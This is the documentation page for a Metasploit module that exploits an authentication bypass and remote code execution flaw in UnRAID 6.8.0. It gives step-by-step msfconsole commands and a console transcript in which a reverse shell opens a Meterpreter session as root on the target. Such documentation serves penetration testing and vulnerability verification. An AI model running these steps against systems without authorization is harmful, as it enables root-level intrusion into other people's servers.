## Vulnerable Application

This module has been tested on UnRAID 6.8.0 without any configuration except setting a root password. Only UnRAID 6.8.0 is affected.

### Description

This module exploits an authentication bypass vulnerability caused by an insecure whitelisting mechanism in `auth_request.php` and then
performs remote code execution as root by abusing the *extract* function used in the `template.php` file.

### Testing Environment

Setup [Unraid 6.8.0](https://s3.amazonaws.com/dnld.lime-technology.com/stable/unRAIDServer-6.8.0-x86_64.zip)
according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getting_Started) guide.

## Verification Steps

  1. Setup UnRAID 6.8.0
  2. Start `msfconsole`
  3. `use exploit/linux/http/unraid_auth_bypass_exec`
  4. `set RHOST [UNRAID]`
  5. `check`
  6. `run`
  7. You should get a new *root* session

## Options

  **TARGETURI** : The URI of the Unraid application

## Scenarios

```
msf5 > use exploit/linux/http/unraid_auth_bypass_exec.rb
msf5 exploit(linux/http/unraid_auth_bypass_exec) > set RHOSTS 10.10.0.173
RHOSTS => 10.10.0.173
msf5 exploit(linux/http/unraid_auth_bypass_exec) > check
[*] 10.10.0.173:80 - The target appears to be vulnerable.
msf5 exploit(linux/http/unraid_auth_bypass_exec) > run

[*] Started reverse TCP handler on 10.10.0.161:4444 
[*] Sending stage (38288 bytes) to 10.10.0.173
[*] Meterpreter session 1 opened (10.10.0.161:4444 -> 10.10.0.173:46894) at 2020-03-20 15:26:40 +0100
[+] Request timed out, OK if running a non-forking/blocking payload...

meterpreter > getuid
Server username: root (0)
```
